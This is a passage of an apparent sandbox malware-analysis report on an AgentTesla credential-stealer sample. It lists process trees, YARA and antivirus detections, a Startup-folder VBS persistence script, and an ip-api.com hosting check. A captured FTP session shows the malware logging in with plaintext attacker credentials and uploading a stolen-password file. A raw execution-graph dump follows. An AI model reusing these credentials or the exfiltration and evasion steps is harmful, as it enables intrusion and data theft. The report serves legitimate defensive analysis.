                                  Jan 11, 2025 03:19:21.075017929 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                  Jan 11, 2025 03:19:21.125785112 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                  Jan 11, 2025 03:19:21.130615950 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                  Jan 11, 2025 03:19:21.539477110 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                  Jan 11, 2025 03:19:21.584115028 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                  Jan 11, 2025 03:19:22.438273907 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:22.443115950 CET | 21 | 49705 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:22.443197966 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:22.447863102 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:22.452739954 CET | 21 | 49705 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:22.453052998 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:34.430327892 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                  Jan 11, 2025 03:19:34.435302019 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
                                  Jan 11, 2025 03:19:34.435379982 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                  Jan 11, 2025 03:19:34.435643911 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                  Jan 11, 2025 03:19:34.440450907 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
                                  Jan 11, 2025 03:19:34.901218891 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
                                  Jan 11, 2025 03:19:34.943470001 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                  Jan 11, 2025 03:19:35.519659042 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                  Jan 11, 2025 03:19:35.676239967 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:35.683115005 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:35.683219910 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:36.204338074 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.204663038 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:36.209644079 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.322186947 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.322351933 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:36.327208996 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.524321079 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.524527073 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:36.529354095 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.639661074 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.639903069 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:36.644772053 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.755359888 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.755621910 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:36.760557890 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.871170998 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.871402025 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:36.876176119 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.986709118 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.991940975 CET | 49714 | 35211 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:36.996898890 CET | 35211 | 49714 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:36.996992111 CET | 49714 | 35211 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:36.997199059 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:37.002059937 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:37.398741007 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:37.399128914 CET | 49714 | 35211 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:37.399223089 CET | 49714 | 35211 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:37.403984070 CET | 35211 | 49714 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:37.404194117 CET | 35211 | 49714 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:37.404623032 CET | 49714 | 35211 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:37.443487883 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:19:37.531800985 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5
                                  Jan 11, 2025 03:19:37.584084988 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63
                                  Jan 11, 2025 03:20:25.678092957 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                  Jan 11, 2025 03:20:25.683406115 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
                                  Jan 11, 2025 03:20:25.683507919 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Jan 11, 2025 03:19:21.056025982 CET | 60579 | 53 | 192.168.2.5 | 1.1.1.1
                                  Jan 11, 2025 03:19:21.064203978 CET | 53 | 60579 | 1.1.1.1 | 192.168.2.5
                                  Jan 11, 2025 03:19:22.119621038 CET | 59338 | 53 | 192.168.2.5 | 1.1.1.1
                                  Jan 11, 2025 03:19:22.437109947 CET | 53 | 59338 | 1.1.1.1 | 192.168.2.5
                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                  Jan 11, 2025 03:19:21.056025982 CET | 192.168.2.5 | 1.1.1.1 | 0x1f77 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                  Jan 11, 2025 03:19:22.119621038 CET | 192.168.2.5 | 1.1.1.1 | 0x7b6 | Standard query (0) | ftp.antoniomayol.com | A (IP address) | IN (0x0001) | false
                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                  Jan 11, 2025 03:19:21.064203978 CET | 1.1.1.1 | 192.168.2.5 | 0x1f77 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                  Jan 11, 2025 03:19:22.437109947 CET | 1.1.1.1 | 192.168.2.5 | 0x7b6 | No error (0) | ftp.antoniomayol.com | antoniomayol.com | | CNAME (Canonical name) | IN (0x0001) | false
                                  Jan 11, 2025 03:19:22.437109947 CET | 1.1.1.1 | 192.168.2.5 | 0x7b6 | No error (0) | antoniomayol.com | | 162.241.62.63 | A (IP address) | IN (0x0001) | false
                                  • ip-api.com
                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  0 | 192.168.2.5 | 49704 | 208.95.112.1 | 80 | 5728 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jan 11, 2025 03:19:21.125785112 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                  Jan 11, 2025 03:19:21.539477110 CET | 175 | IN | HTTP/1.1 200 OK
                                      Date: Sat, 11 Jan 2025 02:19:21 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  1 | 192.168.2.5 | 49706 | 208.95.112.1 | 80 | 6520 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jan 11, 2025 03:19:34.435643911 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                  Jan 11, 2025 03:19:34.901218891 CET | 175 | IN | HTTP/1.1 200 OK
                                      Date: Sat, 11 Jan 2025 02:19:34 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 46
                                      X-Rl: 43
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                  Jan 11, 2025 03:19:36.204338074 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220-You are user number 2 of 150 allowed.
                                      220-Local time is now 20:19. Server port: 21.
                                      220-IPv6 connections are also welcome on this server.
                                      220 You will be disconnected after 15 minutes of inactivity.
                                  Jan 11, 2025 03:19:36.204663038 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63 | USER johnson@antoniomayol.com
                                  Jan 11, 2025 03:19:36.322186947 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5 | 331 User johnson@antoniomayol.com OK. Password required
                                  Jan 11, 2025 03:19:36.322351933 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63 | PASS cMhKDQUk1{;%
                                  Jan 11, 2025 03:19:36.524321079 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5 | 230-OK. Current restricted directory is /
                                      230 28 Kbytes used (0%) - authorized: 2048000 Kb
                                  Jan 11, 2025 03:19:36.639661074 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5 | 504 Unknown command
                                  Jan 11, 2025 03:19:36.639903069 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63 | PWD
                                  Jan 11, 2025 03:19:36.755359888 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5 | 257 "/" is your current location
                                  Jan 11, 2025 03:19:36.755621910 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63 | TYPE I
                                  Jan 11, 2025 03:19:36.871170998 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5 | 200 TYPE is now 8-bit binary
                                  Jan 11, 2025 03:19:36.871402025 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63 | PASV
                                  Jan 11, 2025 03:19:36.986709118 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5 | 227 Entering Passive Mode (162,241,62,63,137,139)
                                  Jan 11, 2025 03:19:36.997199059 CET | 49708 | 21 | 192.168.2.5 | 162.241.62.63 | STOR PW_user-374653_2025_01_10_21_19_34.html
                                  Jan 11, 2025 03:19:37.398741007 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5 | 150 Accepted data connection
                                  Jan 11, 2025 03:19:37.531800985 CET | 21 | 49708 | 162.241.62.63 | 192.168.2.5 | 226-28 Kbytes used (0%) - authorized: 2048000 Kb
                                      226-File successfully transferred
                                      226 0.117 seconds (measured here), 2.68 Kbytes per second


                                  Target ID:0
                                  Start time:21:19:17
                                  Start date:10/01/2025
                                  Path:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                                  Imagebase:0x980000
                                  File size:1'036'800 bytes
                                  MD5 hash:BC7FEE37D8D779B635750BCE96B9ECD9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:2
                                  Start time:21:19:18
                                  Start date:10/01/2025
                                  Path:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                                  Imagebase:0x420000
                                  File size:1'036'800 bytes
                                  MD5 hash:BC7FEE37D8D779B635750BCE96B9ECD9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 58%, ReversingLabs
                                  • Detection: 62%, Virustotal
                                  Reputation:low
                                  Has exited:true

                                  Target ID:3
                                  Start time:21:19:19
                                  Start date:10/01/2025
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                                  Imagebase:0x680000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:21:19:30
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"
                                  Imagebase:0x7ff65cfc0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:21:19:31
                                  Start date:10/01/2025
                                  Path:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                                  Imagebase:0x420000
                                  File size:1'036'800 bytes
                                  MD5 hash:BC7FEE37D8D779B635750BCE96B9ECD9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low
                                  Has exited:true

                                  Target ID:6
                                  Start time:21:19:32
                                  Start date:10/01/2025
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                                  Imagebase:0xd70000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4495084882.0000000003016000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false


                                    Execution Graph

                                    Execution Coverage:3.7%
                                    Dynamic/Decrypted Code Coverage:0.4%
                                    Signature Coverage:5.3%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:50
94358->94360 94361 9cff6b 94359->94361 94806 9848ba 49 API calls 94359->94806 94800 9a1dfc 94360->94800 94364 98936c 81 API calls 94361->94364 94366 9cff83 94364->94366 94368 984550 56 API calls 94366->94368 94367 98ce19 48 API calls 94369 9cfef3 94367->94369 94370 9cff92 94368->94370 94371 98518c 48 API calls 94369->94371 94372 9cffca 94370->94372 94373 9cff96 GetLastError 94370->94373 94374 9cff01 94371->94374 94378 9cfff5 94372->94378 94379 9d0011 94372->94379 94375 9cffaf 94373->94375 94376 9cff33 94374->94376 94803 9c6514 GetFileAttributesW FindFirstFileW FindClose 94374->94803 94390 9cff43 Mailbox 94375->94390 94807 98453b CloseHandle 94375->94807 94805 98d286 48 API calls 94376->94805 94382 99f4ea 48 API calls 94378->94382 94383 99f4ea 48 API calls 94379->94383 94381->94357 94381->94390 94385 9cfffa 94382->94385 94383->94390 94384 9cff11 94384->94376 94387 9cff15 94384->94387 94808 9e29e8 48 API calls ___crtGetEnvironmentStringsW 94385->94808 94804 9c6318 52 API calls 3 library calls 94387->94804 94390->94269 94391 9cff1e 94391->94376 94393 98d7f7 48 API calls 94392->94393 94394 9df0c0 94393->94394 94395 98d7f7 48 API calls 94394->94395 94396 9df0c8 94395->94396 94397 98d7f7 48 API calls 94396->94397 94398 9df0d0 94397->94398 94399 98936c 81 API calls 94398->94399 94410 9df0de 94399->94410 94400 98c799 48 API calls 94400->94410 94401 986a63 48 API calls 94401->94410 94402 9df2f9 Mailbox 94402->94269 94404 9df2b3 94406 98518c 48 API calls 94404->94406 94405 986eed 48 API calls 94405->94410 94408 9df2c0 94406->94408 94407 9df2ce 94409 98518c 48 API calls 94407->94409 94857 98510d 48 API calls Mailbox 94408->94857 94413 9df2dd 94409->94413 94410->94400 94410->94401 94410->94402 94410->94404 94410->94405 94410->94407 94411 98bdfa 48 API calls 94410->94411 94414 98bdfa 48 API calls 94410->94414 94416 9df2cc 94410->94416 94421 98936c 81 API calls 94410->94421 94422 98510d 48 API calls 94410->94422 94423 98518c 48 API calls 94410->94423 94415 9df175 CharUpperBuffW 
94411->94415 94858 98510d 48 API calls Mailbox 94413->94858 94418 9df23a CharUpperBuffW 94414->94418 94835 98d645 94415->94835 94416->94402 94859 986b68 48 API calls 94416->94859 94845 99d922 94418->94845 94421->94410 94422->94410 94423->94410 94425 9ca6fb 94424->94425 94426 99f4ea 48 API calls 94425->94426 94427 9ca709 94426->94427 94428 9ca717 94427->94428 94429 98d7f7 48 API calls 94427->94429 94428->94269 94429->94428 94431 9de84e 94430->94431 94432 9de868 94430->94432 94870 9ccc5c 86 API calls 4 library calls 94431->94870 94871 9dccdc 48 API calls 94432->94871 94435 9de871 94436 98fe30 334 API calls 94435->94436 94437 9de8cf 94436->94437 94438 9de96a 94437->94438 94440 9de916 94437->94440 94469 9de860 Mailbox 94437->94469 94439 9de978 94438->94439 94442 9de9c7 94438->94442 94890 9ca69d 48 API calls 94439->94890 94872 9c9b72 48 API calls 94440->94872 94445 98936c 81 API calls 94442->94445 94442->94469 94444 9de949 94873 9945e0 94444->94873 94448 9de9e1 94445->94448 94446 9de99b 94891 98bc74 48 API calls 94446->94891 94450 98bdfa 48 API calls 94448->94450 94452 9dea05 CharUpperBuffW 94450->94452 94451 9de9a3 Mailbox 94892 993200 335 API calls 2 library calls 94451->94892 94453 9dea1f 94452->94453 94455 9dea26 94453->94455 94456 9dea72 94453->94456 94893 9c9b72 48 API calls 94455->94893 94457 98936c 81 API calls 94456->94457 94458 9dea7a 94457->94458 94894 981caa 49 API calls 94458->94894 94461 9dea54 94462 9945e0 334 API calls 94461->94462 94462->94469 94463 9dea84 94464 98936c 81 API calls 94463->94464 94463->94469 94465 9dea9f 94464->94465 94895 98bc74 48 API calls 94465->94895 94467 9deaaf 94896 993200 335 API calls 2 library calls 94467->94896 94469->94269 94470->94260 94471->94260 94472->94269 94474 986ef8 94473->94474 94475 986f00 94473->94475 96021 98dd47 48 API calls ___crtGetEnvironmentStringsW 94474->96021 94475->94263 94477->94263 94478->94272 94479->94263 94480->94263 94481->94253 94482->94249 94483->94264 94484->94289 94485->94289 94486->94292 
94487->94292 94488->94299 94489->94295 94490->94305 94527 98936c 94491->94527 94493 9df8ea 94497 9df92c Mailbox 94493->94497 94547 9e0567 94493->94547 94495 9dfb8b 94496 9dfcfa 94495->94496 94502 9dfb95 94495->94502 94610 9e0688 89 API calls Mailbox 94496->94610 94497->94309 94500 9dfd07 94500->94502 94503 9dfd13 94500->94503 94501 9df984 Mailbox 94501->94495 94501->94497 94504 98936c 81 API calls 94501->94504 94578 9e29e8 48 API calls ___crtGetEnvironmentStringsW 94501->94578 94579 9dfda5 60 API calls 2 library calls 94501->94579 94560 9df70a 94502->94560 94503->94497 94504->94501 94509 9dfbc9 94574 99ed18 94509->94574 94512 9dfbfd 94581 99c050 94512->94581 94513 9dfbe3 94580 9ccc5c 86 API calls 4 library calls 94513->94580 94516 9dfbee GetCurrentProcess TerminateProcess 94516->94512 94517 9dfc14 94526 9dfc3e 94517->94526 94592 991b90 94517->94592 94519 9dfd65 94519->94497 94523 9dfd7e FreeLibrary 94519->94523 94520 9dfc2d 94608 9e040f 105 API calls _free 94520->94608 94522 991b90 48 API calls 94522->94526 94523->94497 94526->94519 94526->94522 94609 98dcae 50 API calls Mailbox 94526->94609 94611 9e040f 105 API calls _free 94526->94611 94528 989384 94527->94528 94545 989380 94527->94545 94529 9f4bbf 94528->94529 94530 989398 94528->94530 94533 9f4cbd __i64tow 94528->94533 94540 9893b0 __itow Mailbox _wcscpy 94528->94540 94531 9f4ca5 94529->94531 94535 9f4bc8 94529->94535 94612 9a172b 80 API calls 3 library calls 94530->94612 94613 9a172b 80 API calls 3 library calls 94531->94613 94533->94533 94538 9f4be7 94535->94538 94535->94540 94536 99f4ea 48 API calls 94537 9893ba 94536->94537 94541 98ce19 48 API calls 94537->94541 94537->94545 94539 99f4ea 48 API calls 94538->94539 94543 9f4c04 94539->94543 94540->94536 94541->94545 94542 99f4ea 48 API calls 94544 9f4c2a 94542->94544 94543->94542 94544->94545 94546 98ce19 48 API calls 94544->94546 94545->94493 94546->94545 94548 98bdfa 48 API calls 94547->94548 94549 9e0582 CharLowerBuffW 94548->94549 94614 9c1f11 
94549->94614 94553 98d7f7 48 API calls 94554 9e05bb 94553->94554 94621 9869e9 48 API calls ___crtGetEnvironmentStringsW 94554->94621 94556 9e061a Mailbox 94556->94501 94557 9e05d2 94558 98b18b 48 API calls 94557->94558 94559 9e05de Mailbox 94558->94559 94559->94556 94622 9dfda5 60 API calls 2 library calls 94559->94622 94561 9df77a 94560->94561 94562 9df725 94560->94562 94566 9e0828 94561->94566 94563 99f4ea 48 API calls 94562->94563 94565 9df747 94563->94565 94564 99f4ea 48 API calls 94564->94565 94565->94561 94565->94564 94567 9e0a53 Mailbox 94566->94567 94573 9e084b _strcat _wcscpy __wsetenvp 94566->94573 94567->94509 94568 98cf93 58 API calls 94568->94573 94569 98d286 48 API calls 94569->94573 94570 98936c 81 API calls 94570->94573 94571 9a395c 47 API calls __crtGetStringTypeA_stat 94571->94573 94573->94567 94573->94568 94573->94569 94573->94570 94573->94571 94625 9c8035 50 API calls __wsetenvp 94573->94625 94575 99ed2d 94574->94575 94576 99edc5 VirtualProtect 94575->94576 94577 99ed93 94575->94577 94576->94577 94577->94512 94577->94513 94578->94501 94579->94501 94580->94516 94582 99c064 94581->94582 94584 99c069 Mailbox 94581->94584 94626 99c1af 48 API calls 94582->94626 94589 99c077 94584->94589 94627 99c15c 48 API calls 94584->94627 94586 99f4ea 48 API calls 94588 99c108 94586->94588 94587 99c152 94587->94517 94590 99f4ea 48 API calls 94588->94590 94589->94586 94589->94587 94591 99c113 94590->94591 94591->94517 94591->94591 94593 991cf6 94592->94593 94596 991ba2 94592->94596 94593->94520 94594 991bae 94599 991bb9 94594->94599 94629 99c15c 48 API calls 94594->94629 94596->94594 94597 99f4ea 48 API calls 94596->94597 94598 9f49c4 94597->94598 94600 99f4ea 48 API calls 94598->94600 94601 991c5d 94599->94601 94602 99f4ea 48 API calls 94599->94602 94607 9f49cf 94600->94607 94601->94520 94603 991c9f 94602->94603 94604 991cb2 94603->94604 94628 982925 48 API calls 94603->94628 94604->94520 94606 99f4ea 48 API calls 94606->94607 94607->94594 94607->94606 
94608->94526 94609->94526 94610->94500 94611->94526 94612->94540 94613->94540 94616 9c1f3b __wsetenvp 94614->94616 94615 9c1f79 94615->94553 94615->94559 94616->94615 94617 9c1ffa 94616->94617 94618 9c1f6f 94616->94618 94617->94615 94624 99d37a 60 API calls 94617->94624 94618->94615 94623 99d37a 60 API calls 94618->94623 94621->94557 94622->94556 94623->94618 94624->94617 94625->94573 94626->94584 94627->94589 94628->94604 94629->94599 94631 98cdfb 94630->94631 94632 98cdc5 94630->94632 94633 98ce0e 94631->94633 94634 98ce04 94631->94634 94637 99f4ea 48 API calls 94632->94637 94636 98bcce 48 API calls 94633->94636 94635 986a63 48 API calls 94634->94635 94641 98cdf1 94635->94641 94636->94641 94638 98cdd8 94637->94638 94639 98cde3 94638->94639 94640 9f4621 94638->94640 94639->94641 94643 98ce19 48 API calls 94639->94643 94640->94641 94642 98d7f7 48 API calls 94640->94642 94641->94313 94642->94641 94643->94641 94645 99e535 94644->94645 94646 99e547 94644->94646 94647 99e53b 94645->94647 94648 99e541 94645->94648 94649 98bcce 48 API calls 94646->94649 94691 99e63a 94647->94691 94650 99e63a 48 API calls 94648->94650 94660 9c5a81 94649->94660 94652 9c5c17 94650->94652 94655 98bf20 50 API calls 94652->94655 94653 9c5ab0 94653->94342 94659 9c5c25 94655->94659 94666 9c5c35 Mailbox 94659->94666 94712 9c5cf1 50 API calls 94659->94712 94660->94653 94710 9c5a27 SetFilePointerEx ReadFile 94660->94710 94711 98c799 48 API calls ___crtGetEnvironmentStringsW 94660->94711 94661 9f40c9 94665 99e581 Mailbox 94665->94342 94666->94342 94667->94317 94669 984907 CloseHandle 94668->94669 94670 98455b 94669->94670 94754 9847ff 94670->94754 94674 98458d 94782 9845be SetFilePointerEx SetFilePointerEx 94674->94782 94676 984594 94783 984845 SetFilePointerEx SetFilePointerEx WriteFile 94676->94783 94678 982e1a 94678->94312 94678->94327 94685 98453b CloseHandle 94678->94685 94679->94345 94681 984920 94680->94681 94682 982ea2 94680->94682 94681->94682 94683 984925 CloseHandle 94681->94683 94684 
